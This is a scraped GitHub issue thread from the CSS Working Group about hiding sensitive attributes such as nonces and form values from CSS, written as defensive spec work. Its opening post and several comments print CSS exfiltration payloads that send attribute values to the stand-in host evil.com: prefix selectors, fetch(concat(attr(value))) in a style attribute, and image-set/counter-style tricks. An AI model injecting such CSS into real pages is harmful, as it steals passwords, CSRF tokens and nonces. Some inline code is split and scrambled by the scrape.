Open tabatkins opened 4 years ago
A small note that script nonces are already hidden from CSS as a result of https://github.com/whatwg/html/issues/2369 and https://github.com/whatwg/html/pull/2373; my guess is that for sensitive attributes we may need a different approach though.
In general, I'd be very happy with this change (it's strictly security-positive), but I'm not convinced that it's sufficient to safely enable something like concat()
. Modern applications use a large number of custom attributes and sensitive strings can appear in any attribute, e.g. data-user-config
can have a JSON object with metadata about the user, including a CSRF token or other secrets. A blocklisting approach for a set of "native" attributes will not cover many instances where sensitive data is available in attributes outside of that list; this will increase the risk for existing applications with such patterns.
It would be helpful to at least consider an alternative allowlist-based approach where by default we permit only certain attributes to be accessed from CSS (e.g. ones that seem likely to be useful for developers, anything with a custom new prefix such as css-foo
, etc). Such an allowlist could even be arbitrarily extended by application developers via a JavaScript API -- allowing adding custom CSS-accessible attributes in JS wouldn't be any less safe than the status quo, because an attacker with the capability to execute scripts can already obtain any information from the DOM.
Argh, exfiltrating numerics as described in https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209 is clever, and annoying. ^_^
Okay, I've given it some thought, and yeah, I don't see a reasonable way to do this besides an allowlist. Here's my sketch of an idea:
"*"
token, to expose all attributes?data-css-*
(and/or if we can swing the HTML edit, css-*
) are exposed by default.content
on a pseudo-element still allows attr(foo string)
for any attribute as a top-level value, for back-compat reasons. (Not nested into anything else.)We're not quite there yet in terms of browser support, but in theory you could exfiltrate numerics without JavaScript too.
div[secret] {
background-image: image-set(
"http://evil.com/2.png" 1dpi,
"http://evil.com/0.png" calc(mod(attr(secret integer), 2) * 10000dpi));
}
@counter-style evil {
system: symbolic;
symbols: url(http://evil.com/0.png), url(http://evil.com/1.png)...
}
div[secret]::before {
counter-reset: foo attr(secret integer);
content: counter(foo, evil);
}
The first should request "2.png" if the value is modulus 2, "0.png" otherwise. With some prime factors, enough backgrounds and browser support for image-set
and mod
, you could work out a numeric value. The second won't work because no-one has implemented images for counters yet.
I haven't figured out how to do it for strings yet, but I'm eyeing up @bkardell's "switch" (https://github.com/w3c/csswg-drafts/issues/5009#issuecomment-625478736) and similar proposals. With a suitable font, being able to change the background-image based on an element's width would allow you to sniff the letters in generated content.
So yes I agree something needs fixing here. A few thoughts on your proposal.
attr(href url)
is seen quite a bit in various print+css engines with both target-text
and target-counter
, to include details about where an internal hyperlink is pointing in the text. If an allowlist is used, perhaps we could add attr(href string)
and attr(href url)
to it?
<style>
a[href]::after {
content: "(Chapter " target-counter(attr(href url), chapter)) ", " target-text(attr(href url)) ")";
}
</style>
<p>See <a href="#chap-foo">here</a> for more</p>
<h1 id="chap-foo">Animals</h1>
...
See here (Chapter 4, Animals) for more
For reference, other examples I've seen used that wouldn't be caught by your allowlist include:
margin-top: calc(attr(data-position) * 20mm);
meta[author] { string-set: author attr(author) }
background-image: image(attr(image url));
bookmark-label: attr(data-bookmark string);
As an alternative to managing an allowlist, what about allowing an exemption based on origin? For example, just prevent stylesheets served from a different origin from accessing the attr()
function, or only allow them to do so for attr(foo string)
in the content
property. This would let authors do the neat things they've asked for to their own documents, while preventing third-parties from exfiltrating data.
"Based on origin" doesn't help, as we're wanting to defend against CSS injection, which makes the CSS first-party.
It's probably okay to allow most built-in HTML attributes to be used. Sensitive attributes need to be blocked in general (from Selectors, too), but the rest are likely okay to expose by default, like href
in your example. But I think we still have to block data-* by default, and allowlist them in.
Regarding allow-list based approach: will it break the existing usage in pseudo-element content
property?
My thinking is that no, attr()
used at the top-level of 'content' as a "string" type should continue to work with everything, as it does today.
(But it might be okay to restrict it the same way, if we default to allowlisting most HTML attributes. Depends on existing usage of data-* attributes in attr().)
Every attack relies on <url>
. Can all other uses of attr()
be considered safe and therefore need no restriction at all?
Every attack relies on
<url>
. Can all other uses ofattr()
be considered safe and therefore need no restriction at all?
Not true, as I linked in an earlier comment: https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209
My thinking is that no,
attr()
used at the top-level of 'content' as a "string" type should continue to work with everything, as it does today.
With the latest var()
-like spec, it seems pretty hard to distinguish between the old "attr
in content
as a string" and the advanced "attr
in any property as any type".
attr()
in a property value, it's substituted right away, so we don't know where it will be consumed eventually -- especially when used together with custom variablescontent
of a pseudo-element, attr()
has already been substitutedSo I'm not sure how to make them behave differently.
Fair enough, I should have phrased it as a question: does every attack without Javascript rely on <url>
?
Possibly (but I wouldn't bet on it without thinking harder). That isn't a meaningful restriction, tho, so the question seems moot anyway.
It is meaningful insofar as that apparently Javascript should not have access to any properties set by our depending on a host page, e.g. the width of an iframe. I think that part is outside the responsibility of CSS.
However, perhaps one could phrase a CSS-only restriction for replaced (potentially foreign) elements.
Sensitive attributes need to be blocked in general (from Selectors, too), but the rest are likely okay to expose by default, like href in your example. But I think we still have to block data-* by default, and allowlist them in.
My one concern about this specifically is that href
, src
and other attributes that carry URLs often contain sensitive data; for example, capability URLs include secrets that allow accessing private resources. If we want to limit the exfiltration potential of attr()
or other powerful CSS functions, I'd be a little wary of allowlisting such attributes for CSS access by default.
The CSS Working Group just discussed [selectors][css-values] Hide "sensitive" attributes from CSS
.
Is it a goal for CSS that using a stylesheet from an untrusted source is "safe" in some sense? Because I don't think that would be true with only the change described in the issue. Untrusted CSS could hide elements of the page, inject text and images, make invisible but still clickable elements appear on top of other elements, etc. Making it safe to include untrusted CSS would be a significant project.
I think there are legitimate reasons to allow value
attribute selectors, and disallowing them would degrade some pages. For instance, this type of thing probably already exists:
input[type="radio"][value="dangerous-choice"] { color: red }
Is it a goal for CSS that using a stylesheet from an untrusted source is "safe" in some sense?
I think the goal is to walk a fine line of enabling CSS to ship new, useful features, while preventing security regressions due to the increasing expressive powers of stylesheets, especially as they start approaching the capabilities of scripts. Restricting stylesheets' ability to access sensitive data in the DOM seems like a compromise that can allow this to happen, because it reduces the potential damage of loading CSS outside of the application's control.
It's certainly generally true that developers shouldn't load arbitrary untrusted CSS, but -- in practice -- since the capabilities of stylesheets are lower than the capabilities of scripts, there are many situations where this can still happen. For example:
style
attributes, but sometimes for <style>
blocks). Some sanitizers are lax and allow the use of any CSS function; this is fine if the worst that can happen is that the style calls calc()
; less so if it can call extract-all-attribute-values-and-send-to-evil-dot-com()
.style
attributes makes it very difficult to ship a CSP with a style-src
without 'unsafe-inline'
. This is okay if injected CSS is limited in its capabilities, but becomes a problem when CSS gains access to arbitrary data on the page.So it's not really "make untrusted CSS safe to include", but rather "don't make it significantly more unsafe than it currently is".
A few questions:
data-
attribute the only way?@mikewest, in https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ, suggests hiding "sensitive" attributes from CSS entirely:
nonce
,value
on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted withattr()
.This seems completely reasonable to me; there's no reasonable use-case for
nonce
to be usable in CSS, and the use-cases for extractingvalue
(displaying in an error message displayed in a::before
?) are weak enough that I'm happy to remove that.
I would be very unhappy about such a change that breaks old website functionality. For instance, I have used CSS access to the value
attribute of checkboxes a lot for multiple-choice test like quizzes. Here's a real life example:
<style>
input[value="x"]:checked + label {color:green}
input[value="x"]:checked + label::after {content: " … is correct! ☺"}
input[value=""]:checked + label {color:red}
input[value=""]:checked + label::after {content: " … is wrong."}
</style>
<fieldset>
<legend>Labradors are passionate:</legend>
<input type="checkbox" id="_37" value=""> <label for="_37">mathematicians</label>
<br><input type="checkbox" id="_38" value=""> <label for="_38">guardians</label>
<br><input type="checkbox" id="_39" value=""> <label for="_39">dancers</label>
<br><input type="checkbox" id="_40" value="x"> <label for="_40">swimmers</label>
</fieldset>
Would custom elements defining form controls via ElementInternals be able to declare certain attributes as sensitive? Would JS developers be able to declare a sensitive attribute as "non-sensitive" and expose it to CSS somehow? Or is mirroring it to a data- attribute the only way?
I don't think we're at the point of having a specific API proposal here, but IMHO the answer to both questions is that there's nothing preventing us from building an API like this, and it would indeed be useful. Specifically, it would help sites that match on input[value]
retain their current functionality, like in the examples mentioned above.
I imagine it would also be possible to build a default allowlist for legacy uses, i.e. we could permit certain functions or properties in combination with commonly used attributes, such as value
. This does complicate the design, but it would get us close to allowing backward compatibility while offering a safe path towards shipping new, more powerful, CSS functions.
Such an allowlist could even be arbitrarily extended by application developers via a JavaScript API
Please take into consideration cases where there is no javascript enabled. Perhaps a declarative definition in the <head>
element which is far less likely to contain XSS than the <body>
?
For a long time, data-exfiltration attacks have been possible using CSS attribute selectors; with careful use of a streaming stylesheet, an attacker can start with
input[value^="a"]{background-image:url(https://evil.com/pw-stealer?prefix=a);}
(etc for b-z), then based on that result, stream in another set like[value^="ha"]
,[value^="hb"]
, etc, and eventually steal the entire attribute value.This can be used to get script nonces from a page, csrf tokens from a form, and in some DOM libraries that live-reflect input values into the
value
attribute, can steal usernames and passwords as well.We have plans to introduce a
url()
variant that can take functions in its value, aconcat()
function for joining strings together, and now have a more powerfulattr()
function that can be used anywhere to fetch the value of an attribute. Combined, these would make the exfiltration attacks trivial; slipping in a simplestyle="background-image: fetch(concat("https://evil.com/pw-stealer?pw=", attr(value string)));"
would grab the attribute in one go, no cleverness required beyond the initial CSS injection.Since "concat a URL fragment with an attr value" is actually one of the main use-cases for the concat() function, it would be unfortunate to lose that entirely. And doing so wouldn't stop the more complex exfiltration outlined at the start of this message anyway.
@mikewest, in https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ, suggests hiding "sensitive" attributes from CSS entirely:
nonce
,value
on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted withattr()
.This seems completely reasonable to me; there's no reasonable use-case for
nonce
to be usable in CSS, and the use-cases for extractingvalue
(displaying in an error message displayed in a::before
?) are weak enough that I'm happy to remove that.Thoughts?